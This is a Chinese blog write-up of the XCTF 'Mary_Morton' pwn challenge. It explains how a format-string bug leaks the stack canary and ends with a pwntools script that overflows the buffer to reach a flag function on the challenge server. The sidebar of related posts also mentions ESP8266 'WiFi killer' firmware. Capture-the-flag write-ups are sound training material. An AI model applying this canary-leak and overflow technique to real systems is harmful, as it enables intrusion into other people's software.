[攻防世界 pwn]——Mary_Morton

最新推荐文章于 2022-12-19 22:12:33 发布
最新推荐文章于 2022-12-19 22:12:33 发布
阅读量188 收藏
点赞数
分类专栏: # 攻防世界
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113881260
版权

[攻防世界 pwn]——Mary_Morton

  • 题目地址: https://adworld.xctf.org.cn/
  • 题目:
    在这里插入图片描述
    checksec看下,64位还开启了NX和canary保护。(一般开启canary保护,都有格式化字符串漏洞)
    在这里插入图片描述

在IDA中看看, 果然有格式化字符串漏洞
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
仔细看看代码会发现, 这个是个死循环, 1 里面有栈溢出, 2里面有格式化字符串漏洞, 3是退出。
我们可以先利用格式化字符串的漏洞, 泄露出canary, 然后就可以利用栈溢出修改返回地址了。
在这里插入图片描述
在这里插入图片描述
最近我学了一个新的, 计算偏移的方法,很好用。当然你也可以下断点自己在gdb里面自己看, 自己调试
在这里插入图片描述
一般写八个就够了, 基本都在8个偏移以内,和自身的偏移。好像好多都是6, 这个也是。
因为61对应97就是a
然后找一下canary和输入之间的偏移
在这里插入图片描述在这里插入图片描述
所以最终的偏移为 17 + 6 =23
我们还知道cat_flag的地址

exploit

from pwn import *
p=remote('111.200.241.244',42124)

p.sendlineafter('3. Exit the battle','2')
p.sendline('%23$p')

p.recvuntil('0x')
canary=int(p.recv(16),16)
print "canary:  " + hex(canary)

flag_addr=0x4008da
payload='a'*0x88+p64(canary)+'a'*8+p64(flag_addr)
p.sendlineafter('3. Exit the battle','1')
p.sendline(payload)

p.interactive()
Y-peak
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 Mary_Morton
10-07 289
1.题目 2.IDA分析 3.流程分析
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
攻防世界-Mary_Morton
Henlenl的博客
11-30 3010
检查文件信息 amd64-elf文件 开启了Canary保护 开启了NX保护 ida静态分析 进入到sub_4008EB函数 格式化字符串漏洞 另外进入到sub_400960()函数有栈溢出漏洞 但是有一点开启了Canary 那么我们可以通过 格式化字符串任意读 泄露Canary地址 然后利用这个地址来进行溢出漏洞的利用 栈分布如图 而我们知道 v2就是用来储存canary的值的变量 而buf 大小位0x90 v2的大小位 0x8 覆盖return addr,需要0x90-0x8=0x88大小去
攻防世界Mary_Morton
像初雪一样自由洒落
02-16 919
64位程序,开启了canary和nx保护 执行以下,效果如下: 有提示: 输入1那块存在栈溢出 输入2那块存在格式化字符串漏洞 拖到ida看一下 main函数: 栈溢出的函数: 有canary保护,根据程序可以看出,v2应该就是canary的值,一开始,将_readfsqword(0x28u)的值给v2,后来又和v2做异或操作,只有v2与它还相等,...
攻防世界pwn——Mary_Morton
qq_62076255的博客
12-19 176
做题记录
awd攻防比赛总结——3s_NwGeek.docx
09-30
首先,作者介绍了比赛的规则和环境,包括多个环境、Web 和 Pwn 等。然后,作者分享了自己的战略和技巧,其中包括挖洞、补洞、溯源分析和可持续访问等。 在比赛中,作者遇到了很多的问题,例如服务器Environment会...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出这是一个关于 "AVR系列单片机Mage8PWM脉冲输出程序" 的资源。这意味着主要关注的是 AVR 系列...
攻防世界)(pwnmary_mroton
PLpa的博客
07-20 844
经过一段时间的研究,终于接触到Canary了,不容易啊 拿到本题查看保护 开了NX和Canary两种栈保护,我们运行一下出现,看一下程序逻辑: 根据我们对英语强大的理解 (翻译软件的腻量)我们可以看到1标题是栈溢出漏洞函数,2是格式字符串漏洞函数,3为退出,既然他都告诉我们了,我们也不用客气直接用就可以了。 我们可以用格式字符串漏洞泄露Canary的值,然后再进行简单的栈溢出,把Canary填...
攻防世界pwn--Mary_Morton
YANG12345_6的博客
11-16 2206
攻防世界pwnMary_Morton file 一下,查看文件属性 checksec一下,查看保护措施 开了canary,在调用函数的时候会在栈上设置一个标志,标志的位置: EIP EBP canary logol ··· 栈的其他内容 开了NX,栈不可执行。 运行一下 ida查看其反汇编代码 在ida里看到有system函数: 地址:0x4008DA gdb调试,查看格式化字符串参数的位置 第六个位置 查看有关栈溢出的函数: 可以利用的栈溢出的buf的位置:rbp
攻防世界——进阶PWNMary_Morton
baidu_36110484的博客
06-14 402
0x01源码分析 今天做了一道PWN题,考察了格式化字符串漏洞和绕过canary的栈溢出。比较基础,但是还是有值得记录的地方。 checksec查看,64位程序,开启了canary和栈不可执行。拖进IDA里,看到源码逻辑还是比较简单的。存在一个格式化字符串漏洞还有一个栈溢出。还有一个后门函数0x4008DA。 0x02 格式化字符串漏洞 先用老脚本看一下格式化串的相对偏移。 #search_offset.py #encoding:utf-8 from pwn import * context.log_le
攻防世界 Pwn Mary_Morton
MrTreebook的博客
12-05 977
攻防世界 Pwn Mary_Morton1.题目下载地址2.checksec看一下保护3.IDA分析3.1.main函数3.2. sub_400960()3.3. sub_4008EB()3.4.4.gdb动态调试4.1.计算溢出量5.exp 1.题目下载地址 点击下载题目 2.checksec看一下保护 开启了canary,没开PIE 大概率有后门函数,应该不是很难的题 3.IDA分析 3.1.main函数 puts("Welcome to the battle ! "); puts("[Great
攻防世界Mary_Morton wp
苗_的博客
10-13 278
首先查看他的保护机制:(checksec) 有canary保护 然后我们拖进ida发现两处溢出点: 看一下流程图和汇编可以知道readsqword这个地方有canary保护,只有 rax 和fs:28h 两个值相等的时候 才能跳转到返回值,反之则调用stack_chk_fail 找到后门函数 思路:将两个漏洞结合利用,首先利用字符串漏洞,泄露出canary的值,然后在函数要返回的时候再填回去,之后利用栈溢出,让其返回到后门函数 根据程序可以看出,v2应该就是canary的..
XCTF攻防世界高手mary_morton
weixin_45948183的博客
03-24 315
格式化字符串泄露canary,栈溢出 从函数执行就可以看出,一个格式化字符串啊漏洞,一个栈溢出漏洞 checksec了一下有canary的保护,开启了canary,就不能直接利用栈溢出覆盖返回地址,通过通过格式化字符串漏洞泄露canary的值,然后再进行栈溢出的覆盖 buf在rbp-90h,v2在rbp-8h,canary与我们输入参数的偏移为0x90 - 8 = 0x88所以,覆盖返回地址的话...
攻防世界高手进阶区 ——Mary_Morton
weixin_62675330的博客
02-26 3919
攻防世界高手进阶区 ——Mary_Morton 不容易呀,这都已经是第七题了,继续加油! 一,老规矩,先分析一下文件 checksec一下 发现开启了栈溢出,可能这个题就是学习栈溢出漏洞绕过的。 运行一下 告诉了存在栈溢出漏洞和格式化字符串漏洞。 file文件 ┌──(root💀kali)-[/home/…/面/ctf_workstation/Offensive_and_defensive_world/Mary_Morton] └─# file Mary_Morton
2019.10.10攻防世界 Mary_Morton
DSR446的博客
10-10 318
根据索引rbp提供的信息,我们知道,canary位置距离rbp为0x8,而我们的输入参数距离rbp为0x90。且这是一个64位程序。我们可以计算canary的偏移 = 6(6个寄存器)+(0x90-0x8)/8 = 23 :这里子所以减0x8是减的rbp。 【注】:这个程序缺少符号表且没有开PIE,所以我们在下断点的到时候通过在ida中找相应的地址,不用加上程序的加载地址。 最后的 ...
XCTF-攻防世界CTF平台-PWN类——1、Mary_Morton(格式化字符串漏洞、缓冲区溢出漏洞)
Onlyone_1314的博客
09-09 1298
目录标题一级目录二级目录1、查看程序基本信息2、反编译程序3、攻击思路(1)先利用功能2格式化字符串漏洞(2)找到功能1的sub_400960()函数返回地址的位置方法二 一级目录 二级目录 1、查看程序基本信息 Mary_Morton程序,先用file查看: Linux下64位的ELF文件 再用checksec查看 程序开启了Partial RELRO、NX和Canary,没有PIE。程序开启了canary,就不能直接利用栈溢出覆盖返回地址了。因为在初始化一个栈帧时在栈底(stack overflow
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值